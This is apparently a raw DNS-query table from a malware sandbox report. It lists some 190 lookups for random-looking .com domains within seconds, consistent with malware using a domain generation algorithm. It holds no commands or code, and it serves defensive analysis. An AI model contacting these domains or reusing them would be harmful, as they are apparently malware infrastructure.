                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683803082 CEST192.168.2.41.1.1.10x4556Standard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683973074 CEST192.168.2.41.1.1.10x8474Standard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684005976 CEST192.168.2.41.1.1.10xa792Standard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684185982 CEST192.168.2.41.1.1.10x504bStandard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684209108 CEST192.168.2.41.1.1.10x46feStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684345007 CEST192.168.2.41.1.1.10x7c4Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684391022 CEST192.168.2.41.1.1.10x6a93Standard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684506893 CEST192.168.2.41.1.1.10x5edStandard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684581995 CEST192.168.2.41.1.1.10xc3afStandard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684669971 CEST192.168.2.41.1.1.10x9ea3Standard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684787035 CEST192.168.2.41.1.1.10x1d6bStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684828043 CEST192.168.2.41.1.1.10x67e8Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.685530901 CEST192.168.2.41.1.1.10x3215Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.685636997 CEST192.168.2.41.1.1.10xc347Standard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.685720921 CEST192.168.2.41.1.1.10x5525Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.685825109 CEST192.168.2.41.1.1.10xda2Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.685971022 CEST192.168.2.41.1.1.10xdb2Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686136007 CEST192.168.2.41.1.1.10x2f14Standard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686342001 CEST192.168.2.41.1.1.10xbbb2Standard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686342001 CEST192.168.2.41.1.1.10xc0d3Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686508894 CEST192.168.2.41.1.1.10xac9dStandard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686508894 CEST192.168.2.41.1.1.10xc489Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686618090 CEST192.168.2.41.1.1.10xe418Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686686039 CEST192.168.2.41.1.1.10xca27Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686817884 CEST192.168.2.41.1.1.10x3317Standard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.224812984 CEST192.168.2.41.1.1.10x6190Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.225435972 CEST192.168.2.41.1.1.10x96a1Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.226006031 CEST192.168.2.41.1.1.10xae0dStandard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.226572037 CEST192.168.2.41.1.1.10x6d59Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.227030039 CEST192.168.2.41.1.1.10xea6bStandard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.227339983 CEST192.168.2.41.1.1.10xcfb9Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.227734089 CEST192.168.2.41.1.1.10x42a4Standard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.228112936 CEST192.168.2.41.1.1.10x6b6dStandard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.228708982 CEST192.168.2.41.1.1.10xd1acStandard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.228708982 CEST192.168.2.41.1.1.10xfc6aStandard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.228725910 CEST192.168.2.41.1.1.10xf7beStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.228940010 CEST192.168.2.41.1.1.10x79a0Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.229387999 CEST192.168.2.41.1.1.10xe7e2Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.229410887 CEST192.168.2.41.1.1.10x8c0fStandard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.229895115 CEST192.168.2.41.1.1.10x2077Standard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.229933023 CEST192.168.2.41.1.1.10x966dStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.230037928 CEST192.168.2.41.1.1.10xdf4cStandard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.230556011 CEST192.168.2.41.1.1.10xb783Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.230592012 CEST192.168.2.41.1.1.10x5fcbStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.230689049 CEST192.168.2.41.1.1.10xa975Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.231211901 CEST192.168.2.41.1.1.10x9a0Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.231235027 CEST192.168.2.41.1.1.10x7000Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.231384993 CEST192.168.2.41.1.1.10xf593Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.231909037 CEST192.168.2.41.1.1.10x80d3Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.232152939 CEST192.168.2.41.1.1.10x99dfStandard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.232719898 CEST192.168.2.41.1.1.10xb709Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.233071089 CEST192.168.2.41.1.1.10x889eStandard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.233828068 CEST192.168.2.41.1.1.10x431fStandard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.234117031 CEST192.168.2.41.1.1.10x255eStandard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.234844923 CEST192.168.2.41.1.1.10x54b2Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.234961033 CEST192.168.2.41.1.1.10xe33cStandard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.235502005 CEST192.168.2.41.1.1.10x592dStandard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.235517979 CEST192.168.2.41.1.1.10x42f3Standard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.235730886 CEST192.168.2.41.1.1.10x43d2Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.236156940 CEST192.168.2.41.1.1.10x5821Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.236267090 CEST192.168.2.41.1.1.10x4174Standard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.236694098 CEST192.168.2.41.1.1.10xa77aStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.236762047 CEST192.168.2.41.1.1.10x1db0Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.237011909 CEST192.168.2.41.1.1.10x6bf2Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.237468004 CEST192.168.2.41.1.1.10x634Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.237600088 CEST192.168.2.41.1.1.10x62cStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.237961054 CEST192.168.2.41.1.1.10x1f4fStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.238028049 CEST192.168.2.41.1.1.10xfc6cStandard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.238564968 CEST192.168.2.41.1.1.10x6fd3Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.238585949 CEST192.168.2.41.1.1.10xfaa6Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.238723993 CEST192.168.2.41.1.1.10xc49Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.239295006 CEST192.168.2.41.1.1.10xcc6fStandard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.239316940 CEST192.168.2.41.1.1.10xf0a2Standard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.239454031 CEST192.168.2.41.1.1.10x3756Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.239988089 CEST192.168.2.41.1.1.10x18a9Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.240011930 CEST192.168.2.41.1.1.10xfaf8Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.240286112 CEST192.168.2.41.1.1.10x450eStandard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.240838051 CEST192.168.2.41.1.1.10xc9f7Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.240885973 CEST192.168.2.41.1.1.10x9174Standard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.241025925 CEST192.168.2.41.1.1.10xfd66Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.241771936 CEST192.168.2.41.1.1.10x833fStandard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.242289066 CEST192.168.2.41.1.1.10x87cdStandard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.242326975 CEST192.168.2.41.1.1.10xe920Standard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.242436886 CEST192.168.2.41.1.1.10xb42cStandard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.242614985 CEST192.168.2.41.1.1.10x5dStandard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.242635965 CEST192.168.2.41.1.1.10xd9b9Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.242846012 CEST192.168.2.41.1.1.10xd2c7Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.242861032 CEST192.168.2.41.1.1.10x6894Standard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.243053913 CEST192.168.2.41.1.1.10x9658Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.754823923 CEST192.168.2.41.1.1.10xfb51Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.756541967 CEST192.168.2.41.1.1.10xf098Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.756645918 CEST192.168.2.41.1.1.10x7483Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.757152081 CEST192.168.2.41.1.1.10x1976Standard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.757587910 CEST192.168.2.41.1.1.10xb95Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.757692099 CEST192.168.2.41.1.1.10xe243Standard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.758198977 CEST192.168.2.41.1.1.10xf3f3Standard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.758384943 CEST192.168.2.41.1.1.10x858Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.758476973 CEST192.168.2.41.1.1.10xa213Standard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.758951902 CEST192.168.2.41.1.1.10x60d3Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.759141922 CEST192.168.2.41.1.1.10x838Standard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.759449005 CEST192.168.2.41.1.1.10xb7c5Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.759738922 CEST192.168.2.41.1.1.10xb359Standard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.759788036 CEST192.168.2.41.1.1.10x893Standard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.760514021 CEST192.168.2.41.1.1.10x3553Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.761104107 CEST192.168.2.41.1.1.10xa65aStandard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.761614084 CEST192.168.2.41.1.1.10x71f8Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.762268066 CEST192.168.2.41.1.1.10x9c79Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.763292074 CEST192.168.2.41.1.1.10x6d2aStandard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.763577938 CEST192.168.2.41.1.1.10xde0bStandard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.763676882 CEST192.168.2.41.1.1.10x9a6aStandard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.764348030 CEST192.168.2.41.1.1.10xde9dStandard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.764434099 CEST192.168.2.41.1.1.10x4124Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.765321016 CEST192.168.2.41.1.1.10x6532Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.765388966 CEST192.168.2.41.1.1.10xcbecStandard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.765875101 CEST192.168.2.41.1.1.10x5807Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.765924931 CEST192.168.2.41.1.1.10x41e7Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.766794920 CEST192.168.2.41.1.1.10xd2d8Standard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.766910076 CEST192.168.2.41.1.1.10x5e5dStandard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.767693043 CEST192.168.2.41.1.1.10xccd8Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.768063068 CEST192.168.2.41.1.1.10xf3fStandard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.768171072 CEST192.168.2.41.1.1.10x2fc3Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.768688917 CEST192.168.2.41.1.1.10xef3dStandard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.769033909 CEST192.168.2.41.1.1.10xfea4Standard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.769515991 CEST192.168.2.41.1.1.10xead4Standard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.769900084 CEST192.168.2.41.1.1.10x1ef5Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.770373106 CEST192.168.2.41.1.1.10xd581Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.770626068 CEST192.168.2.41.1.1.10x885bStandard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.770828962 CEST192.168.2.41.1.1.10x2cf1Standard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.771146059 CEST192.168.2.41.1.1.10x815Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.771703959 CEST192.168.2.41.1.1.10x5c24Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.771891117 CEST192.168.2.41.1.1.10x4b8cStandard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.772404909 CEST192.168.2.41.1.1.10x6419Standard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.772774935 CEST192.168.2.41.1.1.10x54f0Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.773459911 CEST192.168.2.41.1.1.10x5d48Standard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.775729895 CEST192.168.2.41.1.1.10xf54fStandard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.782687902 CEST192.168.2.41.1.1.10x833cStandard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.783181906 CEST192.168.2.41.1.1.10xfa5aStandard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.783818960 CEST192.168.2.41.1.1.10xfd1Standard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.784385920 CEST192.168.2.41.1.1.10xa000Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.784846067 CEST192.168.2.41.1.1.10xa945Standard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.784909964 CEST192.168.2.41.1.1.10x218eStandard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.785295010 CEST192.168.2.41.1.1.10x2321Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.785557985 CEST192.168.2.41.1.1.10xc74aStandard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.785604000 CEST192.168.2.41.1.1.10xaf12Standard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.785777092 CEST192.168.2.41.1.1.10x785fStandard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.786372900 CEST192.168.2.41.1.1.10x6a94Standard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.786648035 CEST192.168.2.41.1.1.10xc586Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.786694050 CEST192.168.2.41.1.1.10x1012Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.786844969 CEST192.168.2.41.1.1.10x969Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.786983967 CEST192.168.2.41.1.1.10x608dStandard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.787111998 CEST192.168.2.41.1.1.10xa901Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.787249088 CEST192.168.2.41.1.1.10x59c8Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.787384033 CEST192.168.2.41.1.1.10xa0eStandard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:54.003997087 CEST192.168.2.41.1.1.10x31c1Standard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.167090893 CEST192.168.2.41.1.1.10x9fb2Standard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.167692900 CEST192.168.2.41.1.1.10x121Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.176821947 CEST192.168.2.41.1.1.10x98fdStandard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.177357912 CEST192.168.2.41.1.1.10xe7fcStandard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.188448906 CEST192.168.2.41.1.1.10xbd84Standard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.189058065 CEST192.168.2.41.1.1.10x8c4dStandard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.191123962 CEST192.168.2.41.1.1.10x5f44Standard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.192549944 CEST192.168.2.41.1.1.10x59d4Standard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.193335056 CEST192.168.2.41.1.1.10x722aStandard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.193924904 CEST192.168.2.41.1.1.10x737aStandard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.194302082 CEST192.168.2.41.1.1.10xf51fStandard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.194832087 CEST192.168.2.41.1.1.10xffefStandard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.194956064 CEST192.168.2.41.1.1.10xd81eStandard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.195776939 CEST192.168.2.41.1.1.10x2169Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.195835114 CEST192.168.2.41.1.1.10xbbeStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.195985079 CEST192.168.2.41.1.1.10x9e42Standard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.196552038 CEST192.168.2.41.1.1.10x1e74Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.196640015 CEST192.168.2.41.1.1.10x3e3fStandard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.197176933 CEST192.168.2.41.1.1.10x6f34Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.197293997 CEST192.168.2.41.1.1.10xb967Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.197848082 CEST192.168.2.41.1.1.10xdf2bStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.197909117 CEST192.168.2.41.1.1.10xd26cStandard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.198523045 CEST192.168.2.41.1.1.10x1fd5Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.199014902 CEST192.168.2.41.1.1.10xb234Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.203022957 CEST192.168.2.41.1.1.10x577eStandard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.204050064 CEST192.168.2.41.1.1.10xd066Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.208858967 CEST192.168.2.41.1.1.10x374fStandard query (0)vocygim.comA (IP address)IN (0x0001)false
